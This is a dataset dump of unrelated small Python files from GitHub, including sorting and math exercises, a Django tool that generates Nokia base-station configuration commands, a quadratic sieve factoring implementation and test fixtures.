print_scores_confusion_matrix(scores, data_name):\n\t\"\"\"Prints scores of a trained classifier given data to predict, and corresponding ground truth labels.\"\"\"\n\n\tcnf_str = f\"\"\"\n Predicted\n 0 1 \n ------------- \n 0 | {str(scores[f'{data_name}_tn']).ljust(4)} | {str(scores[f'{data_name}_fp']).ljust(4)} |\n True |-------------|\n 1 | {str(scores[f'{data_name}_fn']).ljust(4)} | {str(scores[f'{data_name}_tp']).ljust(4)} |\n ------------- \n \"\"\"\n\n\tscores_str = {\n\t\tf'Precision': scores[f'{data_name}_prc'],\n\t\t'Accuracy': scores[f'{data_name}_acc'],\n\t\t'F1': scores[f'{data_name}_f1'],\n\t\t'ROC AUC': scores[f'{data_name}_auc']\n\t}\n\n\tprint(f'{str(data_name).capitalize()} scores:')\n\t[print(f'\\t{str(k).ljust(10)}: {str(v)[:5]}') for k, v in scores_str.items()]\n\tprint(cnf_str)\n\n\ndef _index_tuple_literal_eval(string: str):\n\t\"\"\"Evaluates a string literal of form 'recipe_num, malt', and returns a tuple (recipe_num(int), malt(str)).\"\"\"\n\n\trec_malt = string[1:-1].split(', ')\n\trec = int(rec_malt[0])\n\tmalt = ', '.join(rec_malt[1:])\n\treturn rec, malt\n\n\ndef _index_tuple_literal_eval_with_ordering(string: str, comm_before_user: bool, vertex_to_int: bool):\n\t# split string of form \"(aa, xx, .., zz)\" to \"aa\" and [\"xx\", .., \"zz\"]\n\tcommunity, *vertex = string[1:-1].split(', ')\n\n\t# join vertex name components back to one string\n\tvertex = ', '.join(vertex)\n\n\t# if vertex name is a number, convert it to integer\n\tif vertex_to_int and vertex.isdigit():\n\t\tvertex = int(vertex)\n\n\t# determine the order of the tuple\n\treturn (community, vertex) if comm_before_user else (vertex, community)\n\n\ndef convert_literal_tuple_string_index_to_tuple(\n\t\tdf: pd.DataFrame, comm_before_user: bool = True, vertex_to_int: bool = False):\n\t\"\"\"\n\tConverts a 
DataFrame's literal string index of form '(community, vertex)' to a tuple (community, vertex) index.\n\n\tChanges input DataFrame inplace.\n\t\"\"\"\n\n\t# convert index to column\n\tdf.reset_index(level=0, inplace=True)\n\n\t# evaluate tuple literal\n\tdf['evaluated_index'] = [\n\t\t_index_tuple_literal_eval_with_ordering(\n\t\t\tstring=tup.index,\n\t\t\tcomm_before_user=comm_before_user,\n\t\t\tvertex_to_int=vertex_to_int)\n\t\tfor tup\n\t\tin df.itertuples()\n\t]\n\n\t# convert back to index\n\tdf.set_index('evaluated_index', inplace=True)\n","repo_name":"lapidshay/GenericAnomalousCommunitiesDetection","sub_path":"AnomalousCommunityDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69940740946","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport h5py\r\nimport pylab\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ntrainpath = str('C:/Users/49691/Desktop/数据集/train/')\r\ntestpath = str('C:/Users/49691/Desktop/数据集/test/')\r\nn_tr = len(os.listdir(trainpath))\r\nprint('num of training files: ', n_tr)\r\n\r\ntrain_labels = pd.read_csv('C:/Users/49691/Desktop/数据集/sample_submission.csv')\r\ntrain_labels.head()\r\n\r\nfrom skimage import io, transform\r\n\r\n\r\nx = np.empty(shape=(n_tr, 224, 224, 3))\r\ny = np.empty(n_tr)\r\n\r\nlabels = train_labels.invasive.values\r\nname = train_labels.name.values\r\n\r\npermutation=np.random.permutation(name.shape[0])\r\nprint(permutation)\r\nprint(labels[permutation])\r\nsave_data = pd.DataFrame({'name':permutation,'invasive':labels[permutation]})\r\nsave_data.to_csv('C:/Users/49691/Desktop/数据集/b.csv')\r\n\r\n\r\nfor k,v in enumerate(np.random.permutation(n_tr)):\r\n print(k,v)\r\n path = '{0}{1}.jpg'.format(trainpath, v)\r\n tr_im = io.imread(path)\r\n x[k] = transform.resize(tr_im, output_shape=(224, 224, 3))\r\n y[k] = float(labels[v-1])\r\n\r\n\r\n","repo_name":"leidaguo/picture_deal","sub_path":"shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24656517034","text":"List=[]\r\ndef InsertSort(List):\r\n print(\"输入对应12个月的需要排序的数据:\")\r\n for i in range(12):\r\n List.append(int(input()))\r\n for p in range(12):\r\n tmp=List[p]\r\n pos=p\r\n for q in range(p-1,-1,-1):\r\n if List[q]>tmp:\r\n List[q+1]=List[q]\r\n pos=q\r\n List[pos]=tmp\r\n print(\"输入的数据按从小到大排序为:\")\r\n for j in range(12):\r\n print(\"%d\"%List[j])\r\n return\r\nInsertSort(List)\r\n","repo_name":"TYalison/Python","sub_path":"insertsort.py","file_name":"insertsort.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15843358806","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport codecs\nimport os\nfrom django.http import StreamingHttpResponse\n# Create your views here.\nfrom cmd_tool.controller import zqkc\nfrom cmd_tool.controller import zqkc\nfrom cmd_tool.controller import zoyx\nfrom cmd_tool.controller import zoyp\nfrom cmd_tool.controller import zoys\nfrom cmd_tool.controller import zdwp\nfrom cmd_tool.controller import zefc\nfrom cmd_tool.controller import zeqc\nfrom cmd_tool.controller import zeuczehc\nfrom cmd_tool.controller import zerc\nfrom cmd_tool.controller import zerm\nfrom cmd_tool.controller import 
zeqv12\nfrom cmd_tool.controller import zean\nfrom cmd_tool.controller import prpara\nfrom cmd_tool.controller import zeqf\nfrom cmd_tool.controller import close_bts\nfrom cmd_tool.controller import zers\nfrom cmd_tool.controller import zeqs\nfrom cmd_tool.controller import zeh\nfrom cmd_tool.controller import dicts\nfrom cmd_tool.controller import dicts2\n\ndef index(request):\n\treturn render(request,'index.html')\n\n# def upload_file(request): \n\n# \treturn render(request,'index.html')\n\ndef get_para(request):\n\tif request.method == \"POST\": # handle the request when the method is POST \n\t\tmyFile =request.FILES.get(\"myfile\", None) # get the uploaded file; defaults to None if no file was sent \n\tif not myFile: \n\t\treturn HttpResponse(\"no files for upload!\") \n\t# destination = open(os.path.join(\"/home/ubuntu/python_code/django_project/ningbo_excel\",myFile.name),'wb+')\n\tdestination = open(os.path.join(\"/home/ubuntu/python_code/generatecmd\",myFile.name),'wb+')\n\tfor chunk in myFile.chunks(): # write the file to disk in chunks \n\t\tdestination.write(chunk) \n\tdestination.close()\n\n\tci1 = request.POST['ci_1']\n\tci2 = request.POST['ci_2']\n\tci3 = request.POST['ci_3']\n\tci4 = request.POST['ci_4']\n\tci5 = request.POST['ci_5']\n\tci6 = request.POST['ci_6']\n\tlist_ci1 = []\n\n\tlist_ci1.append(int(ci1))\n\tlist_ci1.append(int(ci2))\n\tlist_ci1.append(int(ci3))\n\tlist_ci1.append(int(ci4))\n\tlist_ci1.append(int(ci5))\n\tlist_ci1.append(int(ci6))\n\n\tlist_ci = []\n\tfor i in range(0,6):\n\t\tif list_ci1[i] == 0:\n\t\t\tlist_ci=list_ci1[0:i]\n\t\t\tbreak\n\t# print (\"list_ci_new:::\",list_ci_new)\n\n\tbs_start_ip = request.POST['ip_start']\n\tsubnet_ip = request.POST['subnet_ip']\n\tetme_ip = request.POST['etme_ip']\n\tport_zoyp1 = request.POST['port']\n\tetme_id = request.POST['etme_id']\n\t# vlanid = request.POST['vlanid']\n\t\n\tbcxu = request.POST['bcxu']\n\tcell_id = request.POST['bcf']\n\tip_zoyp = request.POST['zoyp_ip']\n\tenglish_name = request.POST['englishname']\n\n\n\tif (len(str(cell_id)) == 2):\n\t\tstr_cell_id = '0'+str(cell_id)\n\telse:\n\t\tstr_cell_id = str(cell_id)\n\t#new_bts(cell_id)\n\t# outdoor sites\n\tif int(cell_id) <= 200:\n\t\tstr_cell_ids = str(cell_id)+'1'\n\telif int(cell_id)<=400 and int(cell_id)>200:\n\t\tstr_cell_ids = str(cell_id%200)+'4'\n\telif int(cell_id)>400 and int(cell_id)<=500:\n\t\tstr_cell_ids = str(cell_id%400)+'7'\n\t# indoor sites\n\telif int(cell_id)>500 and int(cell_id)<=600:\n\t\tstr_cell_ids = str(int(cell_id)-300)+'1'\n\telif int(cell_id)>600 and int(cell_id)<=700:\n\t\tstr_cell_ids = str(int(cell_id)-400)+'4'\n\telif int(cell_id)>700 and int(cell_id)<=800:\n\t\tstr_cell_ids = str(int(cell_id)-500)+'7'\n\tbts = int(str_cell_ids)\n\n\tdict_trx = dicts.dict_ci_zoyx()\n\tn = 0\n\tfor i in range(len(list_ci)):\n\t\tprint (dict_trx[list_ci[i]]['trx'])\n\t\tn = n + dict_trx[list_ci[i]]['trx']\n\n\tport_zoyp = int(port_zoyp1)\n\tstr_zqkc = zqkc.get_zqkc(subnet_ip,etme_ip)\n\tstr_zoyx = zoyx.get_zoyx(str_cell_id,bcxu,n)\n\tstr_zoyp = zoyp.get_zoyp(str_cell_id,n,ip_zoyp,port_zoyp,bs_start_ip)\n\tstr_zoys = zoys.get_zoys(str_cell_id,n)\n\tstr_zdwp = zdwp.get_zdwp(str_cell_id,n,bcxu)\n\tstr_zefc = zefc.get_zefc(cell_id,str_cell_id,etme_id,bs_start_ip)\n\tcell_count = len(list_ci) # number of cells\n\t# english_name = 'CHUANSHAQIAO' # a trailing N would mean Nokia; it is optional, so it is left out here\n\tdict_programme = dicts.get_dict1_zeqc(list_ci)\n\tdict_bts = dicts.get_dict2_zeqc(list_ci)\n\tcell_id = int(cell_id)\n\tstr_zeqc = zeqc.get_zeqc(cell_id,bts,cell_count,english_name,dict_programme,dict_bts,list_ci)\n\t\n\tstr_zeuczehc = zeuczehc.get_zeuczehc(bts,cell_count)
\n\n\tdict_freq = dicts.dict_freq(list_ci)\n\tdict_tsc = dicts.get_dict1_zeqc(list_ci)\n\tstr_zerc = zerc.get_zerc(cell_id,bts,n,dict_trx,list_ci,dict_freq,dict_tsc)\n\n\tstr_zerm = zerm.get_zerm(dict_trx,list_ci,cell_id,bts,n)\n\n\tdict_trx = dicts2.dict_ci_zers(list_ci)\n\tstr_zers = zers.get_zers(bts,dict_trx,list_ci)\n\n\tdict_para = dicts2.dict_ci_zeqg(list_ci)\n\tstr_zeqv1 = zeqv12.get_zeqv1(bts,dict_para,list_ci)\n\tstr_zeqv2 = zeqv12.get_zeqv2(bts,dict_para,list_ci)\n\n\tstr_zeqs = zeqs.get_zeqs(bts,list_ci)\n\n\n\n\t# dict_ltep = dicts.dict_ci_ltecp(list_ci)\n\t# str_zean = zean.get_zean(dict_ltep,list_ci,bts)\n\t\n\t# helper bookkeeping\n\ttrx = []\n\tfor i in range(0,len(list_ci)):\n\t\ttrx.append(dict_trx[list_ci[i]]['trx'])\n\t# print (\"trx :::: \",trx)\n\ttrx_use=[]\n\ttrx_use.append(0)\n\tfor x in range(0,len(list_ci)-1):\n\t\ttrx_use.append(trx_use[x]+trx[x])\n\t# print (\"trx_use :::\",trx_use)\n\n\t\t\n\t# power control parameters\n\t# bts = int(str_cell_ids)\n\tdict_para = dicts2.dict_ci_zeu(list_ci)\n\tstr_zeug = prpara.get_zeug(bts,dict_para,dict_trx,list_ci)\n\tstr_zeua = prpara.get_zeua(bts,dict_para,dict_trx,list_ci)\n\tstr_zeum = prpara.get_zeum(bts,dict_para,dict_trx,list_ci)\n\tstr_zeus = prpara.get_zeus(bts,dict_para,dict_trx,list_ci)\n\tstr_zeuq = prpara.get_zeuq(bts,dict_para,dict_trx,list_ci)\n\t# BTS parameters\n\tdict_para = dicts2.dict_ci_zeqg(list_ci)\n\tstr_zeqf = zeqf.get_zeqf(bts, dict_para,dict_trx, list_ci)\n\t# parameters that may require shutting the BTS down\n\tstr_zeqg = close_bts.get_zeqg(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqj = close_bts.get_zeqj(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqm = close_bts.get_zeqm(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqb = close_bts.get_zeqb(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqe = close_bts.get_zeqe(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqv = close_bts.get_zeqv(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqy = close_bts.get_zeqy(bts, dict_para, dict_trx,list_ci)\n\n\t# handover parameters\n\tdict_para = dicts2.dict_ci_zehg(list_ci)\n\tstr_zehg = zeh.get_zehg(bts, dict_para,dict_trx, list_ci)\n\tstr_zeha = zeh.get_zeha(bts, dict_para, dict_trx,list_ci)\n\tstr_zehs = zeh.get_zehs(bts, dict_para, dict_trx,list_ci)\n\tstr_zehq = zeh.get_zehq(bts, dict_para, dict_trx,list_ci)\n\tstr_zehi = zeh.get_zehi(bts, dict_para, dict_trx,list_ci)\n\tstr_zehn = zeh.get_zehn(bts, dict_para, dict_trx,list_ci)\n\n\tstr_cmd = ''\n\tstr_cmd += str_zqkc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoyx\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoyp\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoys\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zdwp\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zefc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeuczehc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zerc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zerm\n\tstr_cmd += '\\n'\n\n\tstr_cmd += str_zers\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqv1\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqv2\n\tstr_cmd += '\\n'\t\n\t# str_cmd += str_zeqs\n\tstr_cmd += '\\n'\n\n\tstr_cmd += '#功控参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeug\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeua\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeum\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeus\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeuq\n\tstr_cmd += '\\n'\n\tstr_cmd += '#BTS参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqf\n\tstr_cmd += '\\n'\n\tstr_cmd += '#可能要关BTS'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqg\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqj\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqm\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqb\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqe\n\tstr_cmd +=
'\\n'\n\tstr_cmd += str_zeqv\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqy\n\tstr_cmd += '\\n'\n\tstr_cmd += '#切换参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehg\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeha\n\tstr_cmd += '\\n'\t\n\tstr_cmd += str_zehs\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehq\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehi\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehn\n\tstr_cmd += '\\n'\n\n\tstr_cmd += str_zeqs\n\tstr_cmd += '\\n'\n\n\n\tf1 = codecs.open(r\"cmd.txt\",'w','utf-8')\n\tf1.write(str_cmd)\n\tf1.close()\n\t\n\tf = codecs.open(\"cmd.txt\",'rb','utf-8')\n\tc = f.read()\n\tf.close()\n\tresponse = StreamingHttpResponse(c)\n\tresponse['Content-Type'] = 'application/octet-stream'\n\tresponse['Content-Disposition'] = 'attachment;filename=\"cmd.txt\"'\n\t\n\treturn response\n\t# return HttpResponse(\"上传成功\")\n","repo_name":"Runbacktoo/python-ubuntu","sub_path":"generate_cmd/generate_cmd/generate_cmd/cmd_tool/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73022674385","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n answer = {}\n for word in strs:\n key = \"\".join((sorted(word)))\n if key not in answer:\n answer[key] = [word]\n else:\n answer[key].append(word)\n return answer.values()","repo_name":"Baluyotkevin/LeetPractice","sub_path":"49-group-anagrams/group-anagrams.py","file_name":"group-anagrams.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40003066560","text":"from sqlalchemy.ext.asyncio import (\n create_async_engine,\n AsyncSession\n)\nfrom sqlalchemy.orm import sessionmaker\n\nDATABASE_URL = 'sqlite+aiosqlite:///database.db'\n\nengine = create_async_engine(\n DATABASE_URL,\n echo=True,\n future=True\n)\n\nasync_session = sessionmaker(\n bind=engine,\n class_=AsyncSession,\n autocommit=False,\n autoflush=False,\n expire_on_commit=False,\n)\n\n\n# Depends(get_session)\nasync def get_session() -> AsyncSession:\n async with async_session() as session:\n yield session\n","repo_name":"ghtak/fastapi-base","sub_path":"configs/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29226517539","text":"import pyprimes\n'''\nIt is possible to write ten as the sum of primes \nin exactly five different ways:\n\n7 + 3\n5 + 5\n5 + 3 + 2\n3 + 3 + 2 + 2\n2 + 2 + 2 + 2 + 2\n\nWhat is the first value which can be written \nas the sum of primes in over five thousand different ways?\n'''\nprime_gen = pyprimes.primes()\nprimes = [next(prime_gen)]\n\nways = [0]\ntarget= 10\n\nwhile ways[-1] < 5000:\n\n target += 1;\n\n # generate primes up to target\n while primes[-1] < target : primes.append(next(prime_gen))\n\n # storing ways in a list, use integer as index (1 ... 
99)\n    ways = [0]*(target +1);\n\n    ways[0] = 1; # arrived at zero : no more extra possibilities left: 1 way possible\n\n    # for each integer, starting from 1\n    # last prime is bigger than target!\n    for prime in primes[0:-1]:\n\n        # from 1 to target, calculate ways to change\n        for i in range(prime, target+1):\n            ways[i] += ways[i-prime]\n        #print(ways)\n\nprint(\"{} can be written as the sum of primes in {} ways\".format(target,ways[-1]))","repo_name":"mccornet/project_euler_2014","sub_path":"problem_077.py","file_name":"problem_077.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24077782280","text":"#Prompt user to enter a message\r\ncode = str(input(\"Please enter the coded text: \"))\r\n# Prompt user to enter a shift\r\nshift = int(input(\"Please enter the distance value: \"))\r\n# Print the decrypted message\r\nplainText = \"\"\r\n\r\n#Decrypt Loop\r\nfor ch in code:\r\n    #Get the ordinal value of the character\r\n    ordValue = ord(ch)\r\n    #Subtract the distance value from the coded letter\r\n    cipherValue = (ordValue - shift)\r\n    if cipherValue > 0:\r\n        plainText += chr(cipherValue)\r\n\r\n    if cipherValue < 0:\r\n        cipherValue = 127 - (shift - (1 + ordValue))\r\n        plainText += chr(cipherValue)\r\nprint(plainText)\r\n","repo_name":"GlaceonDude/Projects","sub_path":"decrypt_ab.py","file_name":"decrypt_ab.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14474092166","text":"# %%\nimport sys\nsys.path.append(\"../\")\nfrom src.layers.pool import MaxPoolLayerND\nfrom tensorflow import keras\nimport numpy as np\nnp.random.seed(99)\n\nn = 1 # batch size\ninput_shape = (n,6,5,4)\npool_size = (2,2)\nstride = (2,1)\n\n# generate input\ninput = np.random.randint(10, size = input_shape)\n\n# nd max pool layer\nlayer = MaxPoolLayerND(pool_size, stride)\n\n# keras model\nmodel = keras.Sequential([\n    keras.Input(shape=(input_shape[1:])),\n    keras.layers.MaxPool2D(pool_size, stride)\n])\n\n# compare outputs\nprint(\"ND LAYER OUTPUT\")\nprint(layer.forward_pass(input))\nprint(\"KERAS OUTPUT\")\nprint(model.predict(input))\n\n# %%\n","repo_name":"TopiCsarno/Adaptiv_hazi","sub_path":"tests/test_pool_nd.py","file_name":"test_pool_nd.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71450674386","text":"\"\"\"\nQuadratic Sieve Algorithm - Written by Lucas Cecchi\n\"\"\"\nimport math\n\n\ndef jacobi(n, k):\n    if k == 2:\n        return 1\n    assert (k > 0 and k % 2 == 1)\n    n = n % k\n    t = 1\n    while n != 0:\n        while n % 2 == 0:\n            n /= 2\n            r = k % 8\n            if r == 3 or r == 5:\n                t = -t\n        n, k = k, n\n        if n % 4 == k % 4 == 3:\n            t = -t\n        n %= k\n    if k == 1:\n        return t\n    else:\n        return 0\n\n\ndef euclid(a, b):\n    while b:\n        a, b = b, a % b\n    return a\n\n\ndef extended_euclid(a, b):\n    \"\"\"\n    :param a: an integer\n    :param b: an integer\n    :return:\n    old_s: n\n    old_t: m\n    old_r: gcd(a,b)\n    memo: r_i computation memo\n    \"\"\"\n    memo = []\n\n    old_r, r, old_s, s, old_t, t = a, b, 1, 0, 0, 1\n\n    while r != 0:\n        q = old_r // r\n\n        prov = r\n        r = old_r - q * prov\n        old_r = prov\n\n        prov = s\n        s = old_s - q * prov\n        old_s = prov\n\n        prov = t\n        t = old_t - q * prov\n        old_t = prov\n\n        memo.append(old_r)\n\n    return old_s, old_t, old_r, memo
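\n\n# a quick hand-checkable example of the Bezout identity returned above (an added illustration, not from the original source):\n#   extended_euclid(240, 46) gives old_s = -9, old_t = 47, old_r = 2,\n#   and indeed -9*240 + 47*46 = 2 = gcd(240, 46)\n\n\n\"\"\"\nTrial Division, Tonelli's, Strong Pseudo-Prime Test\n\"\"\"\n\n\ndef trial_division(primes, 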
n):\n out = []\n for p in primes:\n exp = 0\n while p ** exp <= n and n % p ** exp == 0:\n exp += 1\n exp -= 1 if exp > 0 else 0\n out.append(exp)\n n /= p ** exp\n\n return out, int(n)\n\n\ndef strong_pseudo_prime(bases, n):\n if n == 2:\n return True\n elif n < 2 or n % 2 == 0:\n return False\n\n a, t = trial_division([2], n - 1)\n\n def base_b_pseudo(base):\n if base == n:\n return True\n\n t_test = t\n b_test = pow(base, t_test, n)\n\n if b_test == n - 1 or b_test == 1:\n return True\n\n for _ in range(a[0]):\n b_test = pow(b_test, 2, n)\n if b_test == n - 1:\n return True\n\n return False\n\n is_pseudo_prime = True\n for b in bases:\n is_pseudo_prime = is_pseudo_prime and base_b_pseudo(b)\n\n return is_pseudo_prime\n\n\ndef inverse_modulo(a, n):\n s, t, r, memo = extended_euclid(a, n)\n return (s % n + n) % n if r == 1 else None\n\n\ndef find_non_residue(p, bases=(2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31,\n 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97)):\n for b in bases:\n if jacobi(b, p) == -1:\n return b\n\n\ndef tonelli(a, p):\n if jacobi(a, p) != 1:\n return None\n s_l, t = trial_division([2], p - 1)\n s = s_l[0]\n b = find_non_residue(p)\n i = 2\n i_l = [2]\n\n for k in range(2, s + 1):\n if pow(a * inverse_modulo(b, p) ** i, t * (2 ** (s - k)), p) != 1:\n i = i + (2 ** (k - 1))\n i_l.append(i)\n return ((b ** (i // 2)) * ((a * inverse_modulo(b, p) ** i) ** ((t + 1) // 2))) % p, i_l\n\n\n\"\"\"\nLinear Algebra Tools\n\"\"\"\n\n\ndef reduce_mat(M, mod=2):\n for row_i in range(len(M)):\n for col_i in range(len(M[row_i])):\n M[row_i][col_i] = int(M[row_i][col_i] % mod)\n\n\ndef rref_mod2(M):\n reduce_mat(M)\n\n lead = 0\n rowCount = len(M)\n columnCount = len(M[0])\n for r in range(rowCount):\n if lead >= columnCount:\n return\n i = r\n while M[i][lead] == 0:\n i += 1\n if i == rowCount:\n i = r\n lead += 1\n if columnCount == lead:\n return\n\n # Swap rows i and r\n if i != r:\n M[i], M[r] = M[r], M[i]\n\n for i in range(rowCount):\n if i != r:\n # Subtract M[i, lead] multiplied by row r from row i\n lead_val = M[i][lead]\n M[i] = [int((m_i - (lead_val * m_r)) % 2)\n for m_r, m_i in zip(M[r], M[i])\n ]\n lead += 1\n\n\ndef get_solution_basis(V):\n # Reduce\n rref_mod2(V)\n\n # Find free variables\n pivot_col = set()\n for i in range(len(V)):\n for j in range(len(V[0])):\n if V[i][j] == 1:\n pivot_col.add(j)\n break\n free_list = set([i for i in range(len(V[0]))]) - pivot_col\n sol_vecs = []\n\n for free_var in free_list:\n sol_vec = []\n sol_idx = 0\n row_idx = 0\n while sol_idx < len(V[0]):\n if sol_idx in free_list:\n sol_vec.append(int(sol_idx == free_var))\n else:\n sol_vec.append(V[row_idx][free_var])\n row_idx += 1\n sol_idx += 1\n\n sol_vecs.append(sol_vec)\n\n return sol_vecs\n\n\n\"\"\"\nQuadratic Sieve tools\n\"\"\"\n\n\ndef generate_factor_base(B, n):\n # Note: this may allow composites for very large B\n for b in reversed(range(3, B)):\n if strong_pseudo_prime([2, 3, 5, 7, 11], b) and jacobi(n, b) == 1:\n yield b\n yield 2 if B > 2 else None\n\n\n\ndef quadratic_sieve(n, B, M, qs_threshold, bypass_psuedoprime_test=False):\n\n if not bypass_psuedoprime_test and strong_pseudo_prime([2, 3, 5, 7], n):\n print(f\"{n} is likely prime\")\n return\n\n # Preliminaries\n k = math.ceil(math.sqrt(n))\n r_l = [r for r in range(k, k + M + 1)]\n s_r = [math.log((r ** 2) - n) for r in r_l]\n factor_base = list(reversed([b for b in generate_factor_base(B, n)]))\n residue_base = [1] + [tonelli(n, p)[0] for p in factor_base[1:]]\n\n sub_count = 0\n # Sieve:\n # subtract log(p) 
from divisible r_i\n for t, p in zip(residue_base, factor_base):\n r_i = 0\n seen = set()\n while r_i < len(r_l) and r_l[r_i] % p != t:\n r_i += 1\n while r_i < len(r_l) and r_l[r_i] % p == t:\n seen.add(r_l[r_i])\n sub_count += 1\n s_r[r_i] -= math.log(p)\n r_i += p\n r_i = 0\n while r_i < len(r_l) and r_l[r_i] % p != (p - t):\n r_i += 1\n while r_i < len(r_l) and r_l[r_i] not in seen and r_l[r_i] % p == (p - t):\n sub_count += 1\n s_r[r_i] -= math.log(p)\n r_i += p\n\n sieved_r = []\n for s_i in range(len(s_r)):\n if abs(s_r[s_i]) < qs_threshold:\n sieved_r.append(r_l[s_i])\n\n if len(sieved_r) < len(factor_base) + 1:\n print(\"Not enough r values, sieve may fail\")\n\n # Get factorizations, reverse and transpose\n M_tup = [trial_division(factor_base, r ** 2 - n) for r in sieved_r]\n\n # Make sure all the values are B-smooth\n for row in M_tup:\n if row[1] != 1:\n print(\"Sieved r values are not all B-smooth, adjust parameters or sieve may fail\")\n return\n\n M = [m[0] for m in M_tup]\n\n M_t = [[M[j][i] for j in range(len(M))] for i in range(len(M[0]))]\n\n # Solve\n solutions = get_solution_basis(M_t)\n\n for sol in solutions:\n # Calculate x\n x = 1\n for i in range(len(sol)):\n if sol[i]:\n x *= sieved_r[i]\n x %= n\n\n y_exp = [0] * len(factor_base)\n for i in range(len(sol)):\n if sol[i] == 1:\n for exponent_i in range(len(M[i])):\n y_exp[exponent_i] += M[i][exponent_i]\n y = 1\n for i in range(len(y_exp)):\n y *= factor_base[i] ** (y_exp[i] // 2)\n y %= n\n\n assert (y * y) % n == (x * x) % n\n\n # Kraitchik's\n f = euclid(abs(x - y), n)\n if f != 1 and f != n:\n assert n % f == 0\n return f\n\n\nclass QuadraticSieveFactorizer:\n\n def __init__(self, B, M, qs_threshold, bypass_pseudo_prime_test) -> None:\n self.B = B\n self.M = M\n self.qs_threshold = qs_threshold\n self.bypass_pseudo_prime_test = bypass_pseudo_prime_test\n\n def __call__(self, n):\n return quadratic_sieve(n, self.B, self.M, self.qs_threshold, self.bypass_pseudo_prime_test)\n \n \n ","repo_name":"Lucasc-99/QuadraticSieve","sub_path":"quadratic_sieve_factorization.py","file_name":"quadratic_sieve_factorization.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6899323926","text":"# Set up logger function so we can log to two files\nimport logging\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\ndef setup_logger(name, log_file, level=logging.INFO):\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n new_logger = logging.getLogger(name)\n new_logger.setLevel(level)\n new_logger.addHandler(handler)\n\n return new_logger\n\nmy_logger = setup_logger('my_logger', 'src/logging.log', level=logging.WARNING)\ninfo_logger = setup_logger('info_logger', 'src/info.log', level=logging.INFO)","repo_name":"AsharHabib/reimbursement-system","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74171690704","text":"# -*- coding: utf-8 -*-\n# @File : conftest.py\n# _author_=feng\n# date: 2021/1/13\nimport requests\nimport pytest\nimport xlrd\nfrom xlutils.copy import copy\nfrom TP_Api_Test.configs.config import HOST\nfrom TP_Api_Test.Lib.Login_Module.login_token import Loginclass\n\n\n@pytest.fixture(scope=\"session\")\ndef login_fixture():\n s = requests.Session()\n info = Loginclass(s)\n info.login()\n yield s\n 
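# everything after the yield runs as teardown once the whole test session ends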
